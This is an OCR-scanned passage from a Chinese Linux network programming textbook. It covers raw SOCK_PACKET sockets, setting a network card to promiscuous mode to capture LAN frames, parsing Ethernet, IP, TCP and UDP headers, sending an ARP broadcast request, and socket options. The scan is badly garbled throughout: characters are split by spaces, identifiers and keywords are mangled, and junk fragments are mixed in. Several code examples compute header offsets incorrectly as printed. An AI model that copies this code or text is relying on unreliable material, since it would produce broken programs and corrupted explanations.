76 err = setsockopt (s, IPPROTO ITP, IP_DROP MEMBERSHIP, &mreq, 
sizeof (mreq)); 

77 

78 close(s); 

79 return 0; 

80 } 


11.4 数据 链 路 层 访 问 


在 Linux 下 数据 链 路 层 的 访问 通常 是 通过 编写 内 核 驱 动 程序 来 实现 的 ， 在 应 用 层 使 用 
SOCK_PACKET 类 型 的 协议 族 可 以 实现 部 分 功能 。 


11.4.1 SOCK_PACKET 类 型 


建立 套 接 字 的 时 候选 择 SOCK_PACKET 类 型 , 内核 将 不 对 网 络 数据 进行 处 理 而 直接 交 
给 用 户 , 数据 直接 从 网 卡 的 协议 栈 交 给 用 户 。 建立 一 个 SOCK_PACKET 类 型 的 套 接 字 使 用 
如 下 方式 : 

socket (AF_INET, SOCK_PACKET,htons (0x0003)); 


其 中 AF_INET 表示 因特网 协议 族 , SOCK_PACKET 表示 截取 数据 帧 的 层次 在 物理 层 ， 
网 络 协议 栈 对 数据 不 做 处 理 。 值 0x0003 表示 截取 的 数据 帧 的 类 型 为 不 确定 , 处 理 所 有 的 包 。 

使 用 SOCK PACKET 进行 程序 设计 的 时 候 , 需要 注意 的 主要 方面 包括 协议 族 选择 、 获 
取 原 始 包 、 定 位 他 包 、 定 位 TCP 包 、 定 位 UDP 包 、 定 位 应 用 层 数 据 儿 个 部 分 ， 下 面 儿 节 
中 将 进行 详细 地 介绍 。 


11.4.2 ”设置 套 接口 以 捕获 链 路 帧 的 编程 方法 


在 Linux 下 编写 网 络 监听 程序 ， 比 较 简单 的 方法 是 在 超级 用 户 模式 下 ， 利 用 类 型 为 
SOCK_PACKET 的 套 接口 (用 socket(O) 函 数 创建 ) 来 捕获 链 路 帧 数据 。Linux 程序 中 需 引用 
如 下 头 文 件 : 


#include <sys/socket.h> 


#include <sys/ioct1.h> /*ioctl 命令 */ 
#include <netinet/if ether.h> /*ethhdr 结构 */ 
#include <net/if.h> /*ifreq 结构 */ 
#include <netinet/in.h> /*in_addr 结构 */ 
#include <netinet/ip.h> /*iphdr 结构 */ 
#include <netinet/udp.h> /*udphdr 结构 */ 
#include <netinet/tcp.h> /*tcphdr 结构 */ 


建立 SOCK_PACKET 类 型 套 接 字 的 方法 在 11.4.1 节 中 已 经 进行 了 介绍 ,如果 要 监视 所 
有 类 型 的 包 ， 则 需要 采用 如 下 代码 : 


int fd; 


/*fd 是 套 接口 的 描述 符 */ 


fd = socket (AF INET, SOCK PACKET, htons (0x0003) ) ; 


.317 。 
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侦 听 其 他 主机 网 络 的 数据 在 局 域 网 诊断 中 经 常 使 用 。 如 果 要 监听 其 他 网 卡 的 数据 ， 需 
要 将 本 地 的 网 卡 设置 为 “混杂 ”模式 ， 当 然 还 需要 一 个 都 连接 于 同一 HUB 的 局 域 网 或 者 
有 具有 “镜像 ”功能 的 交换 机 才 可 以 ， 和 否则 ， 只 能 接收 到 其 他 主机 的 广播 包 。 


char*ethname = "eth0"; /* 对 网 卡 eth0 进行 混杂 设置 */ 
EeecETEEEe 本 YE /* 网 络 接口 结构 */ 

strcpy (ifr.ifr name, ethname); /*"eth0" 写 入 ifr 结构 的 一 个 字段 中 */ 
i = ioctl (fd, SIOCGIFFLAGS, &ifr); /* 获 得 eth0 的 标志 位 值 */ 

dF (<0) /* 判 断 是 否 取出 出 错 */ 

close (fd); 


perror("can’t get flags \n"); 

return -1; 
} 
ifr.ifr flags|=IFF _PROMISC;  /* 保 留 原 来 设置 的 情况 下 ,在 标志 位 中 加 入 "混杂 "方式 */ 
i = ioctl(fd, SIOCSIFFLAGS, &ifr); /* 将 标志 位 设置 写 入 */ 


if (i<0) /* 判 断 是 否 写 入 出 错 */ 
{ 

perror ("promiscuous set error\n"); 

return -2; 


} 

上 面 的 代码 使 用 了 ioctl0 的 SIOCGIFFLAGS 和 SIOCSIFFLAGS 命令 ， 用 来 取出 和 写 
ition 注意 , 在 修改 网 络 接口 标志 的 时 候 , 务必 要 先 将 之 前 的 标志 pa 
与 想 设 置 的 位 进行 “位 或 ”计算 后 再 写 入 ; 不 要 直接 将 设置 的 位 值 写 入 ， 因 为 直接 写 

i 盖 之 前 的 设置 ， ee deg 遵循 如 下 步骤 : 

(1) 取出 标志 位 。 

(2) 目标 标志 位 = 取出 的 标志 位 | 设置 的 标志 位 。 

(3) 写 入 目标 标志 位 。 


11.4.3 ”从 套 接口 读 取 链 路 帧 的 编程 方法 


以 太 网 的 数据 结构 如 图 11.10 所 示 ， 总 长 度 最 大 为 1518 字 节 ， 最 小 为 64 字 节 ， 其 中 
目标 地 址 的 MAC 为 6 字 节 ， 源 地 址 MAC 为 6 字 节 ， 协 议 类 型 为 2 字 节 ， 含 有 46 一 1500 
字 节 的 数据 ， 尾 部 为 4 个 字 节 的 CRC 校 验 和 。 以 太 网 的 CRC 校 验 和 一 般 由 硬件 自动 设置 


或 者 剥离 ， 应 用 层 不 用 考虑 。 
6 字 节 6 字 节 2 字 节 46~1500 字 节 4 字 节 
目标 地 址 源 地 址 。 | 。 类 型 十 帧 内 数据 | CRC 术 验 和 
- 以 太 网 头 部 IP 层 | 


图 11-10 ”以 太 网 帧 示意 图 
在 头 文件 <netinet/if ether.h> 中 定义 了 如 下 常量 


#define ETH ALEN 6 /* 以 太 网 地 址 , 即 MAC 地 址 , 6 字 节 */ 
#define ETH HLEN 14 /* 以 太 网 头 部 的 总 长 度 */ 

#define ETH ZLEN 60 /* 不 含 CRC 校 验 的 数据 最 小 长 度 */ 
#define ETH DATA LEN 1500 /# 帧 内 数据 的 最 大 长 度 */ 


和 


#define ETH FRAME LEN 1514 /* 不 含 CRC 校 验 和 的 最 大 以 太 网 数据 长 度 */ 


以 太 网 头 部 结构 定义 为 如 下 形式 : 


struct ethhdr { 


unsigned char h dest[ETH ALEN]; /* 目 的 以 太 网 地 址 */ 
unsigned char h source[ETH ALEN]; /* 源 以 太 网 地 址 */ 
_ bel6 h_proto; /* 包 类 型 */ 


}; 

套 接 字 文件 描述 符 建 立 后 ， 就 可 以 从 此 描述 符 中 读 取 数 据 ， 数 据 的 格式 为 上 述 的 以 太 
网 数据 ， 即 以 太 网 帧 。 套 接口 建立 以 后 ， 就 可 以 从 中 循环 读 取 捕 获 的 链 路 层 以 太 网 帧 。 要 
建立 一 个 大 小 为 ETH FRAME LEN 的 缓冲 区 ， 并 将 以 太 网 的 头 部 指向 此 缓冲 区 ， 例 如 


char ef[ETH FRAME LEN]; /* 以 太 帧 缓冲 区 */ 

struct ethhdr*p_ethhdr; /* 以 太 网 头 部 指针 */ 

int n; 

P_ethhdr = (struct ethhdr*)ef; /* 使 p_ethhdr 指向 以 太 网 帧 的 帧 头 */ 


/* 读 取 以 太 网 数据 ,n 为 返回 的 实际 捕获 的 以 太 帧 的 帧 长 */ 
n= readl(fd, ef, ETH FRAME LEN) 


接收 数据 以 后 ， 缓 冲 区 ef 与 以 太 网 头 部 的 对 应 关系 如 图 11.11 所 示 。 


h_dest | h_source | h_proto 


6 字 节 


图 11.11 以 太 网 帧 缓冲 区 与 以 太 网 头 部 结构 ethhdr 的 映射 关系 


因此 ， 要 获得 以 太 网 帧 的 目的 MAC 地 址 、 源 MAC 地 址 和 协议 的 类 型 ， 可 以 通过 
p_ethhdr->h_dest、p_ethhdr->h_source 和 p_ethhdr->h_proto 获得 。 下 面 的 代码 将 以 太 网 的 信 
县 打印 出 来 : 


/* 打 印 以 太 网 帧 中 的 MAC 地 址 和 协议 类 型 */ 
/* 目 的 MAC 地 址 */ 
printflrqdest MACG: *)? 
for(i=0; i< ETH ALEN-1; i++){ 
printf ("%02x-", p_ethhdr->h dest([i]); 
} 
printf("%02x\n ", p_ethhdr->h dest[ETH ALEN-1]); 
/* 源 MAC 地 址 */ 
printf ("source MAC: "); 
for (i=0; i< ETH ALEN-1; i++){ 
printf("%02x-", p_ethhdr->h source[i]); 
a ("$02x\n ", p_ethhdr->h dest[ETH ALEN-1]); 
/* 协 议 类 型 , 0x0800 为 IP 协议 ，0x0806 为 ARP 协议 ，0x8035 为 RARP 协议 */ 
printf ("protocol: 0x%04x", ntohs(p_ethhdr->h proto)); 


11.4.4 定位 IP 包头 的 编程 方法 
获得 以 太 网 帧 后 ， 当 协议 为 0x0800 时 ， 其 负载 部 分 为 IP 协议 。IP 协议 的 数据 结构 如 


si 
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图 11.12 所 示 。 
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ip_hl ip_tos 


ip id 


ip_ttl ip_p 


ip_len 
ip_off 
ip_sum 20 个 字 节 


ip_src 


ip_dst 


选项 (32 位 ) 


数据 


图 11.12 


IP 数据 的 示意 图 


IP 头 部 的 数据 结构 定义 在 头 文件 <netinetip.h> 中 ， 代 码 如 下 : 


struct iphdr { 
#if defined( LITTLE ENDIAN BITFIELD) 
_u8 ihl:4, 
version:4; 


#elif defined (_ BIG ENDIAN BITFIELD) 
_u8 version:4, 
hlL:Ay 
#else 
#error "Please fix <asm/byteorder.h>" 
#endif 
_u8 tos; 
_bel6 tot len; 
_bel6é id; 
_bel6 frag off; 
_u8 ttl; 
_u8 protocol; 
_ul6 check; 
_be32 saddr; 
_be32 daddr; 
/*IP 选项 */ 


I 


/* 小 端 */ 

/*IP 头 部 长 度 ,单位 为 32bit*/ 
/*IP 版 本 , 值 为 4*/ 

/* 大 端 */ 

/*IP 版本, 值 为 4*/ 

/*IP 头 部 长 度 ,单位 为 32bit*/ 


/* 服 务 类 型 */ 
/* 总 长 度 */ 

/* 标 识 #/ 
/* 片 偏 移 */ 

/* 生 存 时 间 */ 

/* 协 议 类 型 */ 

/* 头 部 校 验 和 */ 
/* 源 IP 地 址 */ 
/* 目 的 IP 地 址 */ 


若 捕获 的 以 太 帧 中 h_proto 的 取 值 为 0x0800, 将 类 型 为 iphdr 的 结构 指针 指向 帧 头 后 面 
载荷 数据 的 起 始 位 置 ， 则 可 以 得 到 IP 数据 包 的 报头 部 分 。 通 过 saddr 和 daddr 可 以 得 到 IP 


/* 打 印 IP 报 文 的 源 IP 地 址 和 目的 IP 地 址 */ 
if(ntohs (p_ethhdr->h proto)==0x0800) 
{ 

/* 定 位 TIP 头 部 */ 

struct iphdr*p iphdr = 

/* 打 印 源 IP 地 址 */ 


(struct iphdr*) 


报 文 的 源 卫 地 址 和 目的 他 地址 ， 下 面 的 代码 打印 IP 报 文 的 源 中 地 址 和 目的 他 地 址 。 


/*0x0800:IP 包 */ 


(ef + ETH HLEN); 


Printf("src ip:%$s\n"，inet_ntoa (P_iphdr->saddr) ) 


“a 
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/* 打 印 目 的 IP 地 址 */ 
printf ("dest ip:%s\n", inet ntoal(p iphdr->daddr)); 


11.4.5 ”定位 TCP 报头 的 编程 方法 
TCP 的 数据 结构 如 图 11.13 所 示 。 


0 15 16 31 
源 端口 号 (16 位 ) 目的 端口 号 (16 位 ) 
序列 号 (32 位 ) 
确认 号 (32 位 ) 20 个 字 节 
头 部 长 度 (4 位 | 保留 (6 位 ) | URG|ACK| PSH |RST| SYN | FIN | 窗口 尺寸 (16 位 ) 
TCP 校 验 和 (16 位 ) 紧急 指针 (16 位 ) 
选项 (32 位 ) 
数据 
图 11.13 ”TCP 数据 结构 示意 图 
对 应 的 数据 结构 在 头 文件 <netinet/tcp.h> 中 定义 ， 代 码 如 下 : 
struct tcphdr 
_ul6 source; /* 源 地 址 端口 */ 
_ul6 dest; /* 目 的 地 址 端口 */ 
_u32 seq; /* 序 列 号 */ 
_u32 ack seq; /* 确 认 序列 号 */ 
#if defined( LITTLE ENDIAN BITFIELD) 
_ul6 resl:4, /* 保 留 */ 
doff:4, /* 偏 移 */ 
fin:1, /* 关 闭 连 接 标志 */ 
syn:1, /* 请 求 连接 标志 */ 
mse /* 重 置 连接 标志 */ 
sb /* 接 收 方 尽快 将 数据 放 到 应 用 层 标志 */ 
ack:1, /* 确 认 序 号 标志 */ 
urg:1, /* 紧 急 指 针 标 志 */ 
ece:1， /* 拥 塞 标志 位 */ 
cwr:1; /* 拥 塞 标志 位 */ 
#elif defined( BIG ENDIAN BITFIELD) 
_ul6 doff:4, /* 偏 移 */ 
resl:4, /* 保 留 */ 
Cwr:1, /* 拥 塞 标志 位 *#/ 
ece:1, /* 拥 塞 标志 位 */ 
Dey /* 紧 急 指 针 标 志 */ 
acks 1 /* 确 认 序 号 标志 */ 
BS /* 接 收 方 尽快 将 数据 放 到 应 用 层 标志 */ 
rt /* 重 置 连接 标志 */ 
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Sn /* 请 求 连接 标志 */ 
Fin /* 关 闭 连 接 标志 */ 
#else 
#error "Adjust your <asm/byteorder.h> defines" 
#endif 
_ul6 window; /* 滑 动 窗口 大 小 */ 
_ul6 check; /* 校 验 和 */ 
M6 VrolpEr, /* 紧 急 字 段 指针 */ 


] 7 

对 于 TCP 协议 ， 其 IP 头 部 的 protocol 的 值 应 该 为 6， 通过 计算 IP 头 部 的 长 度 可 以 得 
到 TCP 头 部 的 地 址 , 即 TCP 的 头 部 为 IP 头 部 偏 移 ihl*4。TCP 的 源 端口 和 目的 端口 可 以 通 
过 成 员 source 和 dest 来 获得 。 下 面 的 代码 将 源 端口 和 目的 端口 的 值 打印 出 来 : 

//* 打 印 TCP 报 文 的 源 端口 值 和 目的 端口 值 */ 


if (p_iphdr->protocol==6) 
{ 


/* 取 得 TCP 报头 */ 

struct tcphdr*p tcphdr = (struct tcphdr*) (p_iphdr+p iphdr->ihl*4); 
/* 打 印 源 端口 值 */ 

printf("src port:%d\n", ntohs(p tcphdr->source)); 

/* 打 印 目 的 端口 值 */ 


printf ("dest port:%d\n", ntohs(p tcphdr->dest)); 


11.4.6 ”定位 UDP 报头 的 编程 方法 
UDP 的 数据 结构 如 图 11.14 所 示 。 


0 1516 31 
源 端 口号 16 位 ) 目的 端口 号 (16 位 ) 
UDP 数据 长 度 (16 位 ) UDP 校 验 和 (16 位 ) 


8 个 字 节 
| 


数据 


图 11.14 UDP 数据 结构 示意 图 


UDP 的 头 部 数据 结构 在 文件 <netinet/udp.h> 中 定义 ， 代 码 如 下 : 


struct udphdr 
{ 


u int16 t source; /* 源 地 址 端口 */ 
u int16 t dest; /* 目 的 地 址 端口 */ 
uint16 t len; /*UDP 长 度 */ 

u int16 t check; /*UDP 校 验 和 */ 


}; 


头 部 数据 结构 的 布局 如 图 11.15 所 示 。 
对 于 UDP 协议 ， 其 IP 头 部 的 protocol 的 值 为 17， 通 过 计算 IP 头 部 的 长 度 可 以 得 到 
UDP 头 部 的 地 址 ， 即 UDP 的 头 部 为 PP 头 部 偏 移 ihl*4。UDP 的 源 端口 和 目的 端口 可 以 通 


“322 。 
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0 15 16 31 
source dest 


len check 


数据 


图 11.15 ”Linux 环境 下 UDP 头 部 示意 图 
过 成 员 source 和 dest 来 获得 。 下 面 的 代码 将 源 端 口 和 目的 端口 的 值 打印 出 来 : 
/* 打 印 UDP 报 文 的 源 端口 值 和 目的 端口 值 */ 


if(P_iphdr->protocol==17) 
{ 


/* 取 得 UDP 报头 */ 

struct udphdr*p udphdr = (struct udphdr*) (p_iphdr+p iphdr->ihl*4); 
/* 打 印 源 端口 值 */ 

printf("src port:%d\n", ntohs(p_udphdr->source)); 

/* 打 印 目 的 端口 值 */ 


printf ("dest port:%d\n", ntohs(p udphdr->dest)); 


11.4.7 ”定位 应 用 层 报 文 数据 的 编程 方法 


定位 了 UDP 和 TCP 头 部 地 址 后 ， 其 中 的 数据 部 分 为 应 用 层 报 文 数据 。 根 据 TCP 和 
UDP 的 协议 获得 应 用 程序 指针 的 代码 如 下 : 


char*app_data = NULL; /* 应 用 数据 指针 */ 
int app len = 07 /* 应 用 数据 长 度 #/ 


/* 获 得 TCP 或 者 UDP 的 应 用 数据 */ 
if(p iphdr->protocol==6) 
{ 
struct tcphdr*p 七 cphdr = (struct tcphdr*) (p iphdr+p iphdr->ihl*4); 
/* 取 得 TCP 报头 */ 
app data = p tcphdr + 20; /* 获 得 TCP 协议 部 分 的 应 用 数据 地 址 */ 
app len = n -16 - p iphdr->ihl*4 - 20;/* 获 得 TCP 协议 部 分 的 应 用 数据 长 度 */ 
}else if(P iphdr->protocol==17) 
| 
struct udphdr*p udphdr = (struct udphdr*) (p iphdr+p iphdr->ihl*4); 
/* 取 得 UDP 报头 */ 
app data = p udphdr + p udphdr->len; ” /* 获 得 UDP 协议 部 分 的 应 用 数据 地 址 */ 
app len = n - 16 - p iphdr->ihl*4 - p udphdr->len; 
/* 获 得 UDP 协议 部 分 的 应 用 数据 长 度 */ 


printf ("application data address:0x%x, length:%d\n",app data,app len); 
/* 打 印 应 用 数据 的 地 址 和 长 度 */ 


11.4.8 ”使 用 SOCK_PACKET 编写 ARP 请 求 程序 的 例子 


本 节 将 利用 SOCK_PACKET 套 接 字 进行 ARP 请 求 的 程序 设计 ， 并 给 出 代码 的 例子 。 


ms 
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1. ARP 协议 数据 和 结构 
包含 以 太 网 头 部 数据 的 ARP 协议 数据 结构 如 图 11.16 所 示 。 


户 层 网 络 编程 


| 以 太 网 头 部 一 一 ARP 请 求 /应 答 
目的 源 帧 类 型 硬件 | 协议 || 硬件 地 | 协议 地 | 操作 | 发 送 方 硬件 | 发 送 方 | 接收 方 硬 | 接收 方 
硬件 地 址 | 硬件 地 址 | “ 类 型 | 类 型 || 址 长 度 | 址 长 度 | 方式 | ”地 址 JP 地 址 | _ 件 地 址 | TP 地 址 
(6 字 节 ) (6 字 节 ) ” (2 字 节 ) (2 字 节 ) (2 字 节 ) (1 字 节 ) ( 字 节 ) (2 字 节 ) (6 字 节 ) (2 字 节 ) ”(6 字 节 ) (2 字 节 ) 
图 11.16 ARP 协议 的 数据 示意 图 
ARP 的 数据 结构 在 头 文件 <netineUif arp.h> 中 定义 ， 代 码 如 下 : 
struct arphdr 
_ bel6 ar_hrd; /* 硬 件 类 型 */ 
_ bel6 ar proy /* 协 议 类 型 */ 
unsigned char ar hin; /* 人 硬件 地 址 长 度 */ 
unsigned char ar pln; /* 协 议 地 址 长 度 */ 
_ bel6 ar_op; /*ARP 操作 码 */ 
及 
对 于 以 太 网 上 的 ARP 请 求 包 ， 上 述 成 员 的 值 如 表 11.6 所 示 。 
表 11.6 ARP 在 以 太 网 上 请 求 包 的 值 和 含义 
成 员 值 含 义 
ar hrd 硬件 类 型 | ”1 | 硬件 地 址 为 以 太 网 接口 
ar_pro 协议 类 型 高 层 协议 为 PP 协议 
ar hm 硬件 地 址 长 度 “| 6 | 6 字 节 , 即 MAC 地 址 48 位 
ar pln 协议 地 址 长 度 IP 协议 地 址 长 度 为 32 位 
ar_ op ARP 操作 码 | 1 ARP 请 求 
2. 例子 中 的 ARP 数据 结构 
按照 图 11.16 所 示 ， 定 义 如 下 以 太 网 的 ARP 数据 结构 : 
struct arppacket 
{ 
unsigned short ar hrd; /* 硬 件 类 型 */ 
unsigned short ar pro; /# 协 议 类 型 */ 
unsigned char ar hln; /* 硬 件 地 址 长 度 */ 
unsigned char ar pln; /* 协 议 地 址 长 度 #/ 
unsigned short ar op; /*ARP 操作 码 */ 
unsigned char ar _sha[ETH ALEN]; /#* 发 送 方 MAC 地 址 */ 
unsigned char* ar sip; /* 发 送 方 IP 地 址 */ 
unsigned char ar tha[ETH ALEN]; /* 目 的 MAC 地 址 */ 
unsigned char* ar tip; /* 目 的 IP 地址 */ 
LR 


.324 。 
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3. ARP 请 求 的 主 程序 代码 


ARP 请 求 包 的 构建 包含 了 以 太 网 头 部 部 分 、ARP 头 部 部 分 、ARP 的 数据 部 分 。 
特别 要 注意 目的 以 太 网 地 址 ， 由 于 ARP 的 作用 就 是 查找 目的 IP 地 址 的 MAC 地址， 


其 中 ， 
所 以 


目的 以 太 网 地 址 是 未 知 的 。 而 且 需 要 在 整个 以 太 网 上 查找 其 人 PP 地址 , 所 以 目的 以 太 网 地 址 
是 一 个 全 为 1 的 值 ， 即 为 {0xFF,0xFF,OxFF,0xFF,0xFF,0xFF}。 


01 #include <sys/socket.h> 

02 #include <sys/ioctl.h> /*ioctl 命令 */ 
03 #include <netinet/if ether.h> /*ethhdr 结构 */ 
04 #include <net/if.h> /*ifreq 结构 */ 
05 #include <unistd.h> 

06 #include <string.h> 

07 #include <arpa/inet.h> 

08 #include <netinet/in.h> /*in_addr 结构 */ 
09 #include <netinet/ip.h> /*iphdr 结构 */ 
10 #include <netinet/udp .h> /*udphdr 结构 */ 
11 #include <netinet/tcp.h> /*tcphdr 结构 */ 
12 struct arppacket 

3 

14 unsigned short ar hrd; /* 硬 件 类 型 */ 

15 unsigned short ar pro; /* 协 议 类 型 */ 

16 unsigned char ar hln; /* 硬 件 地 址 长 度 */ 
六 unsigned char ar pln; /* 协 议 地 址 长 度 */ 
18 unsigned short ar op; /*ARP 操作 码 */ 

19 unsigned char ar sha[ETH ALEN];  /* 发 送 方 MAC 地 址 */ 
20 unsigned char* ar sip; /* 发 送 方 IP 地 址 */ 
21 unsigned char ar tha[lETH ALEN];  /* 目 的 MAC 地 址 */ 
Eh unsigned char* ar tip; /* 目 的 IP 地址 */ 
23 

24 1}; 

25 int main(int argc char*argv[]) 

26°° | 

2 char ef[ETH FRAME LEN]; /* 以 太 帧 缓冲 区 * / 
28 struct ethhdr*p ethhdr; /* 以 太 网 头 部 指针 */ 
29 /* 目 的 以 太 网 地 址 */ 

30 char eth dest[ETH ALEN]={0xFF,OxFF,OxFF,OxFF,OxFF,OxFF}; 
3 /* 源 以 太 网 地 址 */ 

32 char eth source[ETH ALEN]={0x00,0x0C,0x29,0x73,0x9D,0x15}; 
33 /* 目 的 IP 地 址 */ 
34 

35 Tne fd /*fd 是 套 接口 的 描述 符 */ 
36 fd = socket (AF INET, SOCK PACKET, htons (0x0003)); 
37 

38 /* 使 p_ethhdr 指向 以 太 网 帧 的 帧 头 */ 

39 P_ethhdr = (struct ethhdr*)ef; 

40 /* 复 制 目的 以 太 网 地 址 */ 

41 memcpy (Pp_ethhdr->h dest, eth dest, ETH ALEN); 

42 /* 复 制 源 以 太 网 地 址 */ 

43 memcpy (P_ethhdr->h source, eth source, ETH ALEN); 
44 /* 设 置 协议 类 型 , 以 太 网 0x0806*/ 

45 P_ethhdr->h_Proto = htons (0x0806); 

46 

47 struct arppacket*p arp; 
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P_arp = (struct arppacket*)ef + ETH HLEN; /* 定 位 ARP 包 地 址 */ 
p_arp->ar hrd = htons (0x1); /*arp 硬件 类 型 */ 
P_arp->ar pro = htons (0x0800) /* 协 议 类 型 */ 
P_arp->ar_hln = 2 /* 人 硬件 地 址 长 度 */ 
Pp_arp->ar pln = /*IP 地 址 长 度 */ 

计生 尖 以 网 她 址 +/ 

memcpy (P_arp->ar sha, eth source, ETH ALEN); 

/* 源 IP 地址 */ 

P_arp->ar sip=(unsigned char*)inet addr("192.168.1.152"); 
/* 复 制 目的 以 太 网 地 址 */ 

memcpy (P_arp->ar tha, eth dest, ETH ALEN); 

/* 目 的 IP 地 址 */ 


P_arp->ar tip = (unsigned char*)inet addr("192.168.1.1"); 


/* 发 送 ARP 请 求 8 次 ,间隔 1s*/ 

int 1 = 0 

for (i=0;i<8;i++) { 
write(fd，ef,，ETH FRAME LEN); /* 发 送 */ 
sleep (1); /* 等 待 1s*/ 

} 

close (fd); 

return 0; 


} 


上 述 代 码 分 为 如 下 步骤 : 


OOoOOOOOOOOO DO 


口 


第 30 行为 目的 MAC， 全 部 为 0xXFF， 表 示 在 局 域 网 进行 广播 。 

第 32 行为 本 机 的 MAC 地 址 。 

第 36 行 建 立 一 个 SOCK_PACKET 类 型 的 套 接 字 文 件 描述 符 。 

第 39 一 60 行 用 于 构建 ARP 请 求 包 ， 第 39 行 用 于 定位 以 太 网 头 部 。 
第 41 行将 目的 以 太 网 地 址 复制 到 以 太 网 头 部 结构 的 成 员 h_dest 中 。 
第 43 行将 源 以 太 网 地 址 复制 到 以 太 网 头 部 结构 的 成 员 h_source 中 。 
第 45 行 设置 以 太 网 的 协议 类 型 为 0x0806， 即 ARP 协议 。 

第 47 行 定位 ARP 地 址 。 

第 48 一 52 行 设 置 ARP 头 部 成 员 的 值 ， 如 表 11.1 所 示 。 

第 54 行 复制 源 以 太 网 地 址 ， 与 第 42 行 是 一 致 的 。 

第 56 行 设置 发 送 端的 卫 地 址 。 

第 57 一 60 行 分 别 复制 了 目的 以 太 网 地 址 和 目的 IP 地 址 。 其 中 目的 以 太 网 地 址 全 
为 1 的 值 。 

第 62 一 67 行 发 送 数据 ， 期 间 间 隔 1s， 共 发 送 8 次 。 


ll Ws 结 


cient 比较 高 级 的 知识 ， 通 常 这 些 知 识 只 有 在 比较 特殊 的 情况 


下 才 会 使 用 ， 但 是 某 些 知识 却 是 经 常 使 用 而 不 会 察觉 的 ， 例 如 广播 和 多 播 。 本 章 中 利用 / 


播 获得 服务 器 ee 个 比较 实用 的 案例 ， 在 完备 的 网 络 应 用 程序 中 经 常 使 用 。 
除了 以 上 知识 , 还 有 一 些 高 级 套 接 字 的 知识 ， 限 于 篇 幅 没有 进行 介绍 ， 例 如 带 外 数据 、 


卫 选 项 、 


-a 


路 由 套 接 字 接口 等 。 
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带 外 数据 指 当 连 接 中 的 双方 如 果 有 紧急 的 事情 想 要 通知 对 方 ， 发 送 高 优先 级 数据 。 在 
发 送 的 时 候 ， 发 送 函 数 的 选项 部 分 通常 使 用 MSG_OOB， 例 如 : 


send(s, "URG",3,MSG OOB); 


而 接收 方 则 会 接收 到 SIGURG 的 信号 ， 根 据 此 信号 ， 接 收 方 接收 带 外 数据 。 

可 以 使 用 函数 sockatmark() 来 测试 是 否 有 带 外 数据 存在 。 

IP 选项 是 在 20 个 字 节 的 空间 之 外 的 IP 设置 ， 通 常 IPv4 选项 为 IP 源 路 径 选 项 ， 用 于 
记录 数据 报 经 过 的 主机 路 径 ， 即 路 由 器 地 址 的 集合 。 
路 由 套 接 字 选 项 使 用 控制 字 来 设置 路 由 的 特性 ， 例 如 增加 删除 路 由 、 路 径 信息 、 测 度 
等 信息 。 通 常 程序 设计 框架 为 : 

Ss = socket (AF ROUTE, SOCK RAW,0); 


struct rt msghdr rtm; 


/* 设 置 rtm*/ 


局 | 


writel(s, rtm, rtm->rtm msglen); 


即 建立 一 个 AF_ROUTE 的 套 接 字 文 件 描述 符 ， 设 置 路 由 消息 struct rt_msghdr 结构 ， 
通过 发 送 和 接收 来 控制 消息 。 


.327 。 
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章 对 套 接 字 配置 的 获取 或 者 设置 进行 介绍 , 主要 包含 3 个 方面 套 接 字 选项 、ioctl() 
函数 与 套 接 字 有 关 的 请 求 命令 、fcntl() 与 套 接 字 有 关 的 请 求 命 令 。 通 过 本 章 的 学 习 将 能 够 
掌握 基本 的 套 接 字 届 性 配置 方法 。 本 章 主 要 包括 以 下 内 容 : 
口 如 何 使 用 setsockopt() 函 数 和 getsockopt0 〇 函数 ; 
口 SOL_SOCKET 级 别 套 接 字 选 项 介绍 ; 
口 IPPTOTO_IP 级 别 套 接 字 选 项 介绍 ; 
口 IPPROTO_TCP 级 别 套 接 字 选项 介绍 ; 
口 儿 个 使 用 套 接 字 选 项 的 例子 。 
iotcl() 函 数 主要 介绍 如 下 儿 个 方面 的 命令 : 
口 IO 请 求 命令 ; 

文件 请 求 命令 ; 

网 络 接口 请 求 命令 ; 

ARP 请 求 命 令 ; 

路 由 表 请 求 命令 。 

在 fentl() 函 数 中 介绍 如 下 两 个 方面 的 命令 : 

口 异步 IO 请 求 ; 
信号 驱动 IO 请 求 。 


口 
口 
口 
口 


12.1 获取 和 设置 套 接 字 选 项 getsocketopt()/setsocketoptO 


在 进行 网 络 编程 的 时 候 ， 经 常 需要 查看 或 者 设置 套 接 字 的 某 些 特 性 ， 例 如 设置 地 址 复 
用 、 读 写 数 据 的 超时 时 间 、 对 读 缓 冲 区 的 大 小 进行 调整 等 操作 。 获 得 套 接 字 选项 设置 情况 
的 函数 是 getsockopt()， 设 置 套 接 字 选项 的 函数 为 setsockopt()。 


12.1.1 getsockopt() 函 数 和 setsocketopt() 函 数 的 介绍 
getsockopt() 函 数 和 setsockopt() 函 数 的 原型 如 下 : 


#include <sys/types.h> 

#include <sys/socket.h> 

int getsockopt(int s, int level, int optname, void *optval, socklen 七 
*optlen); 

int setsockopt (int s, int level, int optname, const void *#optval, socklen 七 
optlen); 
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getsockopt() 函 数 和 setsockopt() 函 数 用 来 获取 或 者 设置 与 某 个 套 接 字 关联 的 选项 。 选 项 
可 能 存在 于 多 层 协 议 中 , 它们 总 会 出 现在 最 上 面 的 套 接 字 层 。 当 对 套 接 字 选 项 进行 操作 时 ， 
必须 给 出 选项 所 处 的 层 和 选项 的 名 称 。 为 了 操作 套 接 字 层 的 选项 ， 应 该 将 层 的 值 指定 为 
SOL SOCKET。 为 了 操作 其 他 层 的 选项 ， 必 须 给 出 控制 选项 的 协议 类 型 号 。 例 如 ， 为 了 表 
示 一 个 选项 由 TCP 协议 解析 ， 层 应 该 设 定 为 协议 号 TCP 。 

getsockopt() 函 数 和 setsockopt() 函 数 的 参数 含义 如 下 所 述 。 


口 
口 
口 
口 


口 


s: 将 要 获取 或 者 设置 的 套 接 字 描述 符 ， 可 以 通过 socket() 函 数 获得 。 

level: 选项 所 在 协议 层 。 

optname: 选项 名 。 

optval: 操作 的 内 存 缓冲 区 。 对 于 getsockopt() 函 数 ， 指 向 用 于 获取 返回 选项 值 的 组 
冲 区 。 对 于 setsockoptO) 函 数 ， 指 向 设置 的 参数 缓冲 区 。 

optlen: 第 4 个 参数 的 长 度 。 对 于 getsockopt() 函 数 ， 是 一 个 指向 socket t 类 型 
针 ， 当 用 于 传 入 的 参数 时 ， 表 示 传 入 optval 的 实际 长 度 ， 当 用 于 传 出 参数 时 ， 

示 用 于 保存 optval 的 最 大 长 度 。 对 于 setsockopt() 函 数 ，optlen 表示 第 4 pie 
际 长 度 。 


getsockopt() 函 数 和 setsockopt0 函 数 的 返回 值 在 函数 执行 成 功 时 ， 返 回 值 为 0; 函数 执 
